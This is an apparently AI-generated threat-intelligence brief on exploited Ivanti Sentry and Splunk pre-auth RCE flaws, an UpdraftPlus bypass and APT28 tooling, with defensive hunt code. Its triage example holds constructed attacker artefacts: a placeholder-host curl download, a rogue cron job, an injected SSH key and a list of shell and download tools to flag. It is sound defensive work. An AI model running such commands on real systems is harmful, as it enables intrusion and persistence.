ctipilot.ch

CTI Daily Brief — 2026-06-14

Type: daily
Date: 2026-06-14
Generator: Claude Opus 4.8 (`claude-opus-4-8`)
Classification: TLP:CLEAR
Language: English
Prompt: v2.60
Items: 7
CVEs: 7

0. TL;DR

  • Ivanti Sentry CVE-2026-10520 (CVSS 10.0, pre-auth OS command injection) is being exploited in the wild — Shadowserver confirmed at least two internet-exposed gateways were backdoored shortly after the public PoC. CISA added it to KEV on 11–12 June; Swiss/EU public-sector MDM estates running Sentry ≤ R10.5.1 / ≤ R10.6.1 / ≤ R10.7.0 must patch and compromise-assess now (Security Affairs, 2026-06-11). See § 0 callout and § 4.
  • Splunk Enterprise pre-auth RCE (CVE-2026-20253, CVSS 9.8) — your SIEM is the target. watchTowr detailed an unauthenticated path that proxies an internal PostgreSQL-sidecar REST API with empty credentials, reaching code execution during a crafted backup/restore; Splunk-on-AWS is vulnerable out of the box (watchTowr Labs, 2026-06-12). See § 5.
  • UpdraftPlus WordPress backup plugin (CVE-2026-10795, CVSS 8.1) — unauthenticated auth-bypass to RCE, 3 M+ installs. A failed-RSA-decrypt collapse to an all-zero AES key lets an unauthenticated attacker forge RPC commands and upload a plugin for RCE; Wordfence shipped firewall-rule protection to customers ahead of broad disclosure and the exploitation mechanism is public (WPScan, 2026-06-11). Patch to 1.26.5. See § 2.
  • APT28 (GRU Unit 26165) tradecraft has moved to LLM-driven and cloud-native evasion. Sekoia documents LameHug — the first APT28 stealer that generates exfiltration code at runtime via a hosted LLM — plus BeardShell C2 over consumer cloud-storage providers and the FrostArmada SOHO-router DNS-hijack AiTM campaign against Microsoft 365 (Sekoia TDR, 2026-06-11). See § 3.
  • EU ran Cyber Europe 2026 and activated the Cybersecurity Reserve for the first time; Switzerland participated as a partner country. The exercise tested the 2025 EU Cyber Blueprint against a cross-border rail/maritime OT crisis scenario (ENISA, 2026-06-11). See § 1.

Immediate Action — patch Ivanti Sentry now and hunt for an implanted gateway. CVE-2026-10520 is an unauthenticated CVSS 10.0 OS command-injection in the Ivanti Sentry MICS interface that yields root on the appliance; shortly after watchTowr's public proof-of-concept the Shadowserver Foundation observed mass exploitation attempts and confirmed at least two of the then-19 internet-exposed instances had already been backdoored (Security Affairs, 2026-06-11; CERT-EU 2026-008, 2026-06-10). A root compromise of Sentry exposes every mailbox, calendar and enterprise application the gateway brokers. Upgrade to R10.5.2 / R10.6.2 / R10.7.1 immediately, restrict the MICS listener to management networks, and treat any internet-reachable instance as presumed-compromised — audit for unexpected cron entries, authorized_keys changes and anomalous children of the MICS Java process before declaring it clean.

3. Research & Investigative Reporting

Sekoia: APT28 (GRU Unit 26165) tradecraft shifts to LLM-generated payloads and cloud-native C2 [SINGLE-SOURCE]

Sekoia's Threat Detection & Research team published a tradecraft-evolution retrospective on APT28 (Fancy Bear / Forest Blizzard), and the operationally relevant material is the 2025–2026 tooling (Sekoia TDR, 2026-06-11). Three developments stand out for European defenders. LameHug is the first documented APT28 infostealer that delegates its logic to a large language model: base64-encoded prompts are sent to Alibaba's Qwen 2.5-Coder model via the Hugging Face inference API to generate collection and exfiltration code on the fly, observed against Ukrainian government targets — meaning the malicious behaviour is not statically present in the binary. BeardShell is a C++ backdoor that rotates its command-and-control across consumer cloud-storage providers (Koofr, Icedrive, Filen), defeating domain/IP blocklisting because the traffic is ordinary HTTPS to legitimate services. FrostArmada (April 2026) is a SOHO-router DNS-hijack campaign — 18,000-plus unique IPs across 120-plus countries — that rewrites DHCP/DNS on MikroTik and TP-Link devices to mount adversary-in-the-middle attacks against Microsoft 365 sign-ins (T1557 Adversary-in-the-Middle, T1071.001 Web Protocols for the cloud C2). Sekoia notes APT28's GooseEgg implant (CVE-2022-38028) ran for roughly five years before public disclosure — a reminder that current tools likely carry a similar blind-spot horizon.

Why it matters to us: NATO European ministries, defence suppliers and critical-infrastructure operators are named in the targeting. The detection priorities are concrete and IoC-free: hunt cloud-storage beaconing to Koofr/Icedrive/Filen from non-user workstations, alert on outbound traffic to Hugging Face inference endpoints from Windows hosts, monitor MikroTik/TP-Link DNS-setting changes in network-device logs, and treat Office documents delivered through Signal Desktop as a Mark-of-the-Web bypass risk — Sekoia notes APT28 uses the messenger to deliver Office lures that arrive without the Mark-of-the-Web protection.

4. Updates to Prior Coverage

UPDATE: Ivanti Sentry CVE-2026-10520 — exploitation confirmed in the wild, gateways backdoored

UPDATE (originally covered 2026-06-10): the Ivanti Sentry MICS command-injection covered last week as an advisory-plus-patch story is now confirmed exploited. After watchTowr published a working proof-of-concept on 10 June, the Shadowserver Foundation observed mass exploitation attempts and confirmed that at least two of the then-19 internet-exposed Sentry instances had been backdoored shortly after the PoC went public (Security Affairs, 2026-06-11).

The flaw (CVSS 10.0) is reachable by an unauthenticated POST to the MICS handleMessage interface and executes arbitrary OS commands as root, giving an attacker control over every mailbox, calendar and enterprise application the gateway brokers (T1190 Exploit Public-Facing Application; T1505.003 Web Shell post-exploitation). CISA added the CVE to its Known Exploited Vulnerabilities catalog on 11 June and CERT-EU issued advisory 2026-008 urging immediate upgrade (CERT-EU 2026-008, 2026-06-10; BleepingComputer, 2026-06-12). The operational driver is the confirmed in-the-wild backdooring, not any compliance date: any internet-reachable Sentry should be treated as presumed-compromised and compromise-assessed, not merely patched. Affected: Sentry ≤ R10.5.1, ≤ R10.6.1, ≤ R10.7.0; fixed in R10.5.2 / R10.6.2 / R10.7.1. See the § 0 Immediate Action callout and § 6.

Changes since first coverage (2 prior appearances):
  1. 2026-06-14 (2026-W24): Consolidated in § 1 (highest-impact); exploitation confirmed, gateways backdoored.
  2. 2026-06-10 (2026-06-10): First coverage. Public PoC same day; no confirmed in-the-wild exploitation; patch R10.5.2 / R10.6.2 / R10.7.1.

5. Deep Dive — Splunk Enterprise CVE-2026-20253: pre-auth RCE in the SIEM via an unauthenticated PostgreSQL sidecar proxy

The uncomfortable angle on this one is that the vulnerable software is the tool many readers use to find intrusions. CVE-2026-20253 (CVSS 9.8, CWE-306 Missing Authentication for Critical Function) is an unauthenticated remote code execution flaw in Splunk Enterprise, disclosed in Splunk's advisory SVD-2026-0603 on 10 June and dissected by watchTowr Labs on 12 June (Splunk SVD-2026-0603, 2026-06-10; watchTowr Labs, 2026-06-12). It affects Splunk Enterprise 10.0.0–10.0.6 and 10.2.0–10.2.3.

The mechanism. Recent Splunk Enterprise ships a PostgreSQL sidecar service (the splunk-postgres component) that exposes a Go-based REST API on loopback port 5435 — including /v1/postgres/recovery/backup and /v1/postgres/recovery/restore endpoints — and that internal API performs no authentication, on the assumption that only loopback callers can reach it (watchTowr Labs, 2026-06-12). The flaw is that Splunk's main web tier proxies those same endpoints outbound, at paths under /en-US/splunkd/__raw/v1/postgres/, so an external client can reach the no-auth database API by sending empty Basic credentials. From there an attacker writes attacker-controlled files into the sidecar's runtime directory and injects SQL into a crafted backup/restore payload, achieving code execution during the database restore step. watchTowr reports that Splunk Enterprise on AWS is vulnerable in its default configuration because the PostgreSQL sidecar is enabled out of the box, whereas on-premises Windows installs are exposed only where the sidecar has been explicitly enabled (watchTowr Labs, 2026-06-12).

Why the "loopback is safe" assumption fails. The root cause is a trust boundary that exists in the developers' mental model but not in the deployed architecture: the database API trusts the network (loopback-only) instead of the caller, and a second component (the web proxy) silently bridges that network gap. This is the recurring pattern watchTowr highlights — app-level auth was skipped because "the database has auth," but the proxy made the database reachable without it. The mapping is straightforward: T1190 (Exploit Public-Facing Application) for the initial unauthenticated reach, leading to execution on the host (T1059 Command and Scripting Interpreter). Because Splunk frequently runs with high privilege and aggregates logs from across the estate, a compromised indexer or search head is both an execution foothold and a route to the organisation's centralised security telemetry — an attacker who owns the SIEM can read what defenders see and potentially tamper with it.

Hunt and detection concepts. Splunk logs its own HTTP access, so the highest-value hunt is in _internal / the splunkd_access data: look for requests to /en-US/splunkd/__raw/v1/postgres/ paths, especially recovery/backup and recovery/restore, and for requests carrying empty or anonymous Basic-auth credentials from non-loopback source addresses. Unexpected PostgreSQL backup/restore operations in Splunk's operational logs outside a defined maintenance window are a second signal. On the host, watch for child processes spawned by the Splunk service account that are inconsistent with normal operation (shells, interpreters), and for new files appearing under the sidecar's pkg-run runtime path. Because this is the monitoring platform itself, forward Splunk's own access and audit logs to an independent collector so that a post-compromise log wipe on the box does not also erase the evidence of the intrusion.
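A hunt over access-log lines for the proxied sidecar paths and empty-credential external callers described above, as an added example that is neither Splunk's nor watchTowr's code. The log layout is a constructed, simplified CLF-style format (source, ident, user, timestamp, request line, status); mapping it onto the real splunkd_access fields is an assumption to verify before use.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample lines: legitimate loopback sidecar traffic, a normal admin
# search, and two external hits on the proxied PostgreSQL recovery endpoints.
SAMPLE_LOG = """\
127.0.0.1 - splunk-system-user [14/Jun/2026:08:00:01 +0000] "GET /en-US/splunkd/__raw/v1/postgres/status HTTP/1.1" 200
10.20.0.15 - admin [14/Jun/2026:08:01:10 +0000] "POST /en-US/splunkd/__raw/services/search/jobs HTTP/1.1" 201
203.0.113.44 - - [14/Jun/2026:08:02:33 +0000] "POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1" 200
203.0.113.44 - - [14/Jun/2026:08:02:35 +0000] "POST /en-US/splunkd/__raw/v1/postgres/recovery/restore HTTP/1.1" 200
10.20.0.15 - admin [14/Jun/2026:08:05:00 +0000] "GET /en-US/splunkd/__raw/v1/postgres/status HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PROXY_PREFIX = "/en-US/splunkd/__raw/v1/postgres/"   # proxied sidecar API path from the brief
RECOVERY_SUFFIXES = ("recovery/backup", "recovery/restore")


def hunt(log_text: str) -> List[Dict[str, str]]:
    """One finding per request reaching the proxied PostgreSQL sidecar API.

    critical: recovery endpoint, no authenticated user, non-loopback source
    high: other unauthenticated non-loopback reach; review: everything else.
    """
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith(PROXY_PREFIX):
            continue
        unauth = m["user"] == "-"                       # empty/anonymous Basic credentials
        loopback = ipaddress.ip_address(m["src"]).is_loopback  # source field assumed to be an IP
        recovery = m["path"].endswith(RECOVERY_SUFFIXES)
        if unauth and not loopback and recovery:
            severity = "critical"
        elif unauth and not loopback:
            severity = "high"
        else:
            severity = "review"
        findings.append({"ts": m["ts"], "src": m["src"], "user": m["user"],
                         "path": m["path"], "severity": severity})
    return findings
```

Loopback and authenticated hits are still returned as "review" so they can be checked against the maintenance window rather than silently dropped.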

Hardening and remediation. Upgrade to a fixed release — 10.4.0, 10.2.4 or 10.0.7 (Splunk SVD-2026-0603, 2026-06-10) — and prioritise internet-facing and AWS-hosted deployments, the latter because watchTowr reports the sidecar is enabled there by default. On on-premises installs that do not need the PostgreSQL sidecar, confirm it is disabled and stays disabled after the upgrade. Network-side, no Splunk management or web interface should be exposed to the internet; restrict it to administrative networks and place it behind authenticated access controls. There is no reported in-the-wild exploitation at the time of writing, but a public technical analysis of a pre-auth RCE in a widely deployed SIEM closes the gap between disclosure and weaponisation quickly — treat this as an urgent change, not a routine one.

6. Action Items

  • Patch internet-exposed Ivanti Sentry now and compromise-assess — do not just patch (CVE-2026-10520). Upgrade to R10.5.2 / R10.6.2 / R10.7.1, restrict the MICS listener to management networks, and because exposed gateways are confirmed backdoored, audit for persistence (unexpected cron entries, authorized_keys changes, anomalous children of the MICS Java process) before declaring any instance clean. Pre-auth CVSS 10.0 RCE with confirmed in-the-wild backdooring. See § 0 and § 4.
  • Upgrade Splunk Enterprise to 10.4.0 / 10.2.4 / 10.0.7, AWS-hosted instances first (CVE-2026-20253). Pre-auth RCE via the default-enabled PostgreSQL sidecar proxy; ensure no Splunk web/management interface is internet-facing, confirm the sidecar stays disabled on on-prem installs that don't use it, and forward Splunk's own access logs off-box. Hunt /en-US/splunkd/__raw/v1/postgres/ requests with empty Basic-auth from non-loopback sources. See § 5.
  • Update UpdraftPlus to 1.26.5 across all WordPress estates and disable unused UpdraftCentral/Migrator keys (CVE-2026-10795). Unauthenticated auth-bypass to RCE on 3 M+ installs; the exploitation mechanism is public and Wordfence has shipped preventive rules. Hunt for plugin upload/activation outside change windows and udrpc_message POSTs to admin-ajax.php. See § 2.
  • Hunt for APT28's current evasion classes (no IOCs required). Alert on cloud-storage beaconing to Koofr/Icedrive/Filen from non-user workstations, outbound traffic to Hugging Face inference endpoints from Windows hosts, MikroTik/TP-Link DNS-setting changes in device logs, and Office documents delivered via Signal Desktop that lack the Mark-of-the-Web (an APT28 Office-lure delivery path). See § 3.
  • Audit removable backup-media controls. Verify backup media leaving server rooms is encrypted at rest, asset-tagged and access-logged — the Kyushu Electric loss (10.9 M records, unencrypted SSD) is a NIS2 Article 21(2)(h)-class failure with no remote attacker. See § 1.
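The Sentry persistence audit named in the § 0 callout and the Ivanti action item above (unexpected cron entries, authorized_keys changes, anomalous children of the MICS Java process), as an added triage example that is neither Ivanti's nor the brief's own tooling. The process listing, key file, crontab and the `/opt/mics/` marker are constructed assumptions; a real audit takes its baselines from a trusted appliance image.

```python
from typing import Dict, List, Tuple

SHELL_LIKE = {"sh", "bash", "dash", "python", "python3", "perl", "nc", "ncat", "curl", "wget"}
MICS_MARKER = "/opt/mics/"   # assumption: path fragment that identifies the MICS JVM

# Constructed `ps -eo pid,ppid,comm,args` snapshot: the MICS JVM (pid 2101) has a
# legitimate worker child and an unexpected shell child that spawned a downloader.
PS_SNAPSHOT = """\
    1     0 systemd /sbin/init
 2101     1 java    /usr/bin/java -jar /opt/mics/mics.jar
 2188  2101 java    /usr/bin/java -cp /opt/mics/lib worker
 2190  2101 sh      sh -c /tmp/.cache/update.sh
 3301  2190 curl    curl -s http://PLACEHOLDER-HOST/x
"""
# Constructed authorized_keys and crontab contents with assumed known-good baselines.
AUTH_KEYS_NOW = "ssh-ed25519 AAAAC3NzPLACEHOLDER admin@mgmt\nssh-rsa AAAAB3NzPLACEHOLDER backup@unknown\n"
AUTH_KEYS_BASE = "ssh-ed25519 AAAAC3NzPLACEHOLDER admin@mgmt\n"
CRON_NOW = "0 3 * * * /opt/mics/bin/rotate-logs\n*/5 * * * * /tmp/.cache/update.sh\n"
CRON_BASE = "0 3 * * * /opt/mics/bin/rotate-logs\n"


def parse_ps(ps_text: str) -> Dict[int, Tuple[int, str, str]]:
    """Map pid -> (ppid, comm, args); a header line, if present, is skipped."""
    procs = {}
    for line in ps_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) >= 3 and parts[0].isdigit():
            procs[int(parts[0])] = (int(parts[1]), parts[2], parts[3] if len(parts) > 3 else "")
    return procs


def anomalous_mics_children(ps_text: str) -> List[Tuple[int, str, str]]:
    """Shell, interpreter or download-tool descendants of the MICS JVM, sorted by pid."""
    procs = parse_ps(ps_text)
    frontier = [p for p, (_, comm, args) in procs.items() if comm == "java" and MICS_MARKER in args]
    seen, flagged = set(), []
    while frontier:                              # walk the whole tree under every MICS JVM
        parent = frontier.pop()
        for pid, (ppid, comm, args) in procs.items():
            if ppid == parent and pid not in seen:
                seen.add(pid)
                if comm in SHELL_LIKE:
                    flagged.append((pid, comm, args))
                frontier.append(pid)
    return sorted(flagged)


def unexpected_entries(current: str, baseline: str) -> List[str]:
    """Non-comment lines (cron jobs, SSH keys) present now but absent from the baseline."""
    def entries(text: str) -> List[str]:
        return [l.strip() for l in text.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    base = set(entries(baseline))
    return [e for e in entries(current) if e not in base]
```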

7. Verification Notes

  • Items dropped — already covered (PD-8), no material delta: "GreatXML" BitLocker bypass (covered 2026-06-12; still no CVE/patch, no new exploitation); Velvet Ant "Operation Highland" Linux auth-stack backdooring (was the 2026-06-13 deep dive — deep dives are not re-summarised, PD-9); ServiceNow unauthenticated REST endpoint (covered 2026-06-11); University of Nottingham / CVE-2026-35273 ShinyHunters breach (the 455 K-record / multi-campus / ICO-notification facts were already in the 2026-06-12 and 2026-06-13 UPDATEs — a third consecutive update is barred by the long-running-campaign rule; the only new element, Have I Been Pwned indexing, is not material).
  • CVEs that did not clear a § 2 inclusion gate: CVE-2026-47210 (vm2 Node.js sandbox escape, CVSS 9.8) — primary disclosure dated 2026-05-29 (GitLab advisory metadata refreshed 06-12), outside the recency window, no in-the-wild exploitation or public PoC confirmed; relevance is to code-evaluation sandboxes rather than internet-exposed services. CVE-2026-12183 (BUK TS-G gas-station automation auth-bypass, CVSS 9.8) — ENISA EUVD flags it exploited with a public PoC, but the only available sources are a per-CVE aggregator page (CIRCL Vulnerability Lookup) and a low-reliability news aggregator; no vendor or national-CERT advisory exists, and the product is a Russian-developed system with negligible Swiss/EU public-sector deployment.
  • Items dropped — below the daily relevance bar: INTERPOL Operation Ramz / SniperDz PhaaS takedown (201 arrests, MENA region — significant but indirect CH/EU nexus and no 1–7-day defender action); 23andMe $46.75 M breach-settlement approval (civil-liability closure of the 2023 breach; no defender action); Great Marlow School UK ICT incident (resolved in under 48 h with "no threat identified"; limited operational lesson).
  • Single-source items: § 3 APT28 tradecraft evolution rests on the Sekoia TDR report alone — it is primary research (the lab's own analysis), so the attribution and TTP claims are presented as Sekoia's findings; no independent corroboration of the LameHug/BeardShell/FrostArmada specifics was located in-window.
  • Contradictions: none material this run.
  • Sub-agents: all four (S1–S4) returned within budget; all ran on Claude Sonnet 4.6.
  • Coverage gaps: inside-it-ch (Cloudflare Managed Challenge — bridge returned no body; no unique in-window Swiss items beyond those captured elsewhere); sophos-xops (feed 503); group-ib (press-release 503 — INTERPOL/Infosecurity used instead, story covered anyway); databreaches-net (403 — BleepingComputer/TechTimes corroborated the Kyushu story); sec-disclosures-edgar (0 qualifying Item 1.05 8-K filings in window — confirmed absence, not a transport failure); cert-fr-actu (RSS feed stale, returning October 2025 items); prodaft (not fetched within time budget); cnil-fr, edpb, ico-uk (no new in-window notices).